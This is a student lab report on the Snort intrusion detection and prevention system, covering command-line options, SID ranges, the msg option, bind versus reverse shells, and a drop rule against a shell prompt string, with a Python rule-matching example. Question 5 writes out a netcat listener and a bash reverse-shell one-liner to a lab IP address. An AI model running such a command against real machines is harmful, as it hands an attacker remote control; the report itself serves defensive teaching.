lab report 6.edited (docx)

School: Technical University of Mombasa
Course: ACH101
Subject: Computer Science
Date: Nov 24, 2024
Pages: 9

SNORT
Student's Name
Institutional Affiliation
Course
Instructor's Name
Date
Snort

1. In this lab, you used Snort®. Discuss the most significant benefit of using an IDPS and what it does well. Is there ever a situation where an organization would be justified in not using an IDPS?

An IDPS has a variety of benefits. The most significant is that it monitors the network for activity that is anomalous. This monitoring does not depend on anyone watching the console: every alert and event is written to a log, so an administrator who was away can review from that log everything that happened in the meantime.

2. What is the purpose of the following commands?

sudo snort -Tc /etc/snort/snort.conf -Qi eth0:eth1

-T puts Snort in self-test mode: it loads the configuration and rule files, reports any errors and then exits without processing traffic, which is the right check to run before starting Snort as a daemon or system service (-D). -c gives the path of the configuration file. -Q selects inline mode, and -i names the interface to listen on; in inline mode the interface pair eth0:eth1 is bridged, so the test command validates the same configuration and interface pair that the production command will use. Nothing is logged in test mode.

sudo snort -c /etc/snort/snort.conf -i eth0:eth1 -Q

This runs Snort for real with the same configuration. -i eth0:eth1 bridges the two interfaces so that traffic entering one leaves through the other (the bridging itself is done by the DAQ module, afpacket in Snort 2.9, which snort.conf selects), and -Q tells Snort to run in inline mode, in which it decides for every packet whether to pass or drop it; without -Q, a drop rule can only alert, it cannot block.

What is the purpose of -c and -i in the second command? -c specifies the location of the Snort configuration file, and -i specifies the interface (here the interface pair) on which Snort listens.

3. Research Snort documentation online and describe how SIDs are assigned and the purpose of the msg option in Snort rules.

The sid keyword uniquely identifies a Snort rule. Output plugins use this information to identify rules easily, and sid should always be used together with the rev keyword, which records the rule's revision. SID ranges are distributed as follows: values below 100 are reserved for future use, 100 to 999,999 are used by the rules included with the Snort distribution, and 1,000,000 and above are for local rules. The files sid-msg.map and gen-msg.map map a sid (or gid) to its alert message, so that tools reading Snort's output can print the message text for an alert. The msg rule option tells the logging and alerting engine the message to print along with the packet dump or alert. It is a simple text string; the backslash is used as the escape character for characters that would otherwise confuse Snort's rule parser, such as a semicolon, a double quote or the backslash itself.

4. In this lab, you used netcat to set up a listener on the Kali machine and executed bash client-side code to return a reverse shell. Netcat can be used to set up bind shells and reverse shells. What is the difference between bind and reverse shells?

A reverse shell is a shell initiated from the target host back to the attack box, which is left listening in order to pick up the shell. A bind shell is set up on the target host and binds to a particular port, listening for an incoming connection from the attack box. Because the reverse shell's connection is outbound from the target, it passes through firewalls that block inbound connections, which is why it was used in this lab. The bind shell is the classic backdoor in malicious software (Vance, 2020).

5. In the lab, you created a Snort rule based on a hex string. As part of this question, you will create a Snort rule that blocks content based on the non-case-sensitive ASCII string "pport@ST". This blocks the remote listener and logs to the IPS when an attacker attempts to spawn a remote shell using these commands: nc -lvp 8
bash -i >& /dev/tcp/192.168.1.5/8 0>&1

Below are the screenshots, each followed by a description.

Above is Wireshark with a content filter applied: typing pport@STA into the search field on the filter toolbar restricts the display to the packets that contain that string.
Above is the Snort rule. It was saved in /etc/snort/rules/local.rules, the file in which local rules are specified.

The figure above shows the hex dump of the packet selected by the Wireshark filter.
The screenshot above contrasts the listener before and after the rule was loaded: the first run of the bash command, with nothing blocking it, returned a shell, while re-executing the same command afterwards produced no response.

The IPS log above records that step: the drop rule fired on the traffic matched by the Snort rule shown earlier.
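The rule from question 5 and the sid and msg conventions from question 3 are only visible in screenshots, so the following added example (not the report's rule and not Snort code) shows the two pieces of Snort's rule language that the lab relies on: the sid ranges that decide whether a rule belongs in local.rules, and the content match, in its ASCII form with nocase and in its hex form without it. The rule texts LOCAL_RULE, HEX_RULE and BAD_RULE are my assumptions about what the lab's rule looked like (sids 1000001 and 1000002 are chosen here), and the PROMPT payloads are constructed to resemble the interactive bash prompt that a reverse shell sends back to the listener.

```python
"""Snort rule check and content match for the question 5 rule.

Added example, not the report's own rule or Snort code. LOCAL_RULE and
HEX_RULE are guesses at the lab's rule (sids chosen here); the PROMPT
payloads are constructed to resemble an interactive bash prompt.
"""
import re

# sid ranges from the Snort manual's description of the sid keyword
RESERVED_MAX = 99            # < 100: reserved for future use
DISTRIBUTION_MAX = 999_999   # 100 .. 999,999: rules shipped with Snort
LOCAL_MIN = 1_000_000        # >= 1,000,000: local rules

HEADER_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<dir>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)$"
)
OPT_END = re.compile(r"(?<!\\);")   # ';' ends an option unless backslash-escaped


def _unquote(value: str) -> str:
    return value[1:-1] if len(value) >= 2 and value[0] == value[-1] == '"' else value


def _unescape(text: str) -> str:
    """Drop the backslash that protects ';', '"' and '\\' inside option strings."""
    return re.sub(r"\\(.)", r"\1", text)


def parse_rule(text: str) -> dict:
    """Split a rule into header fields and an ordered list of (keyword, value) options."""
    m = HEADER_RE.match(text.strip())
    if not m:
        raise ValueError("not a Snort rule: " + text)
    rule = {k: m.group(k) for k in ("action", "proto", "src", "sport", "dir", "dst", "dport")}
    rule["options"] = []
    for raw in OPT_END.split(m.group("opts")):
        if raw.strip():
            key, _, val = raw.strip().partition(":")
            rule["options"].append((key.strip(), val.strip()))
    return rule


def msg_text(value: str) -> str:
    """The msg option: a plain string printed with the alert, escapes removed."""
    return _unescape(_unquote(value))


def content_bytes(value: str) -> bytes:
    """The content option: text outside |...| is literal, inside |...| is hex."""
    out = bytearray()
    for i, part in enumerate(_unquote(value).split("|")):
        out += bytes.fromhex(part) if i % 2 else _unescape(part).encode("latin-1")
    return bytes(out)


def sid_range(sid: int) -> str:
    if sid <= RESERVED_MAX:
        return "reserved"
    return "distribution" if sid <= DISTRIBUTION_MAX else "local"


def lint_local_rule(rule: dict) -> list:
    """Problems a local.rules entry should not have: missing sid/rev/msg, sid outside the local range."""
    opts = dict(rule["options"])
    problems = []
    if "sid" not in opts:
        problems.append("missing sid")
    elif sid_range(int(opts["sid"])) != "local":
        problems.append(f"sid {opts['sid']} is not in the local range (>= {LOCAL_MIN})")
    if "rev" not in opts:
        problems.append("missing rev")
    if "msg" not in opts:
        problems.append("missing msg")
    return problems


def matches(rule: dict, payload: bytes) -> bool:
    """True when every content option is found in the payload; nocase modifies the content before it."""
    contents = []
    for key, val in rule["options"]:
        if key == "content":
            contents.append([content_bytes(val), False])
        elif key == "nocase" and contents:
            contents[-1][1] = True
    for pattern, nocase in contents:
        hay, needle = (payload.lower(), pattern.lower()) if nocase else (payload, pattern)
        if needle not in hay:
            return False
    return bool(contents)


# Assumed rules (the lab's actual rule is only visible as a screenshot).
LOCAL_RULE = ('drop tcp any any -> any any (msg:"Interactive shell prompt (\\"pport@ST\\") seen"; '
              'content:"pport@ST"; nocase; sid:1000001; rev:1;)')
HEX_RULE = ('alert tcp any any -> any any (msg:"Shell prompt, hex form"; '
            'content:"|70 70 6F 72 74 40 53 54|"; sid:1000002; rev:1;)')
BAD_RULE = 'alert tcp any any -> any any (msg:"wrong sid"; content:"pport@ST"; sid:500;)'

# Constructed payloads: the prompt an interactive bash sends back over a reverse shell.
PROMPT = b"\r\nsupport@STATION01:~$ "
PROMPT_UPPER = b"\r\nSUPPORT@STATION01:~$ "

if __name__ == "__main__":
    for text in (LOCAL_RULE, HEX_RULE, BAD_RULE):
        rule = parse_rule(text)
        print(msg_text(dict(rule["options"])["msg"]), lint_local_rule(rule),
              matches(rule, PROMPT), matches(rule, PROMPT_UPPER))
```

Two things the run makes visible that the screenshots do not: the hex-form rule is byte-exact, so it misses an upper-case prompt that the nocase rule catches, and a rule with a sid in the distribution range is rejected by the lint even though Snort itself would load it; keeping local sids at or above 1,000,000 is what prevents a collision with a rule from the official rule set. Only a rule whose action is drop, loaded into a Snort running with -Q, actually blocks the shell; the same rule with alert would have produced the log entry without stopping the connection.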
References

3.3 Command-Line Options. Retrieved from http://books.gigatux.nl/mirror/snortids/0596006616/snortids-CHP-3-SECT-3.html

Infosec Institute. Snort rules workshop, part one. Retrieved from https://resources.infosecinstitute.com/topic/snort-rules-workshop-part-one/

Mammo, K. (2020). Online Platform for Interactive Tutorials: Cloud-Native Security.

Mytilinakis, P. (2020). Attack methods and defenses on Kubernetes (Master's thesis, University of Piraeus).

Snort 2.9.16.1 User's Manual (2020, July 24).

Snort general rule options (2019, January 22). Retrieved from https://www.sbarjatiya.com/notes_wiki/index.php/Snort_general_rule_options

Vance, W. (2020). Linux for Hackers: A Comprehensive Beginners Guide to the World of Hacking using Linux. joiningthedotstv.